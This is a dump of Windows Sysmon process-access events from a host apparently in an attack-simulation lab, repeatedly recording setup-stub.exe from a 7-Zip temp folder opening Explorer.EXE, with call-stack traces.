13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 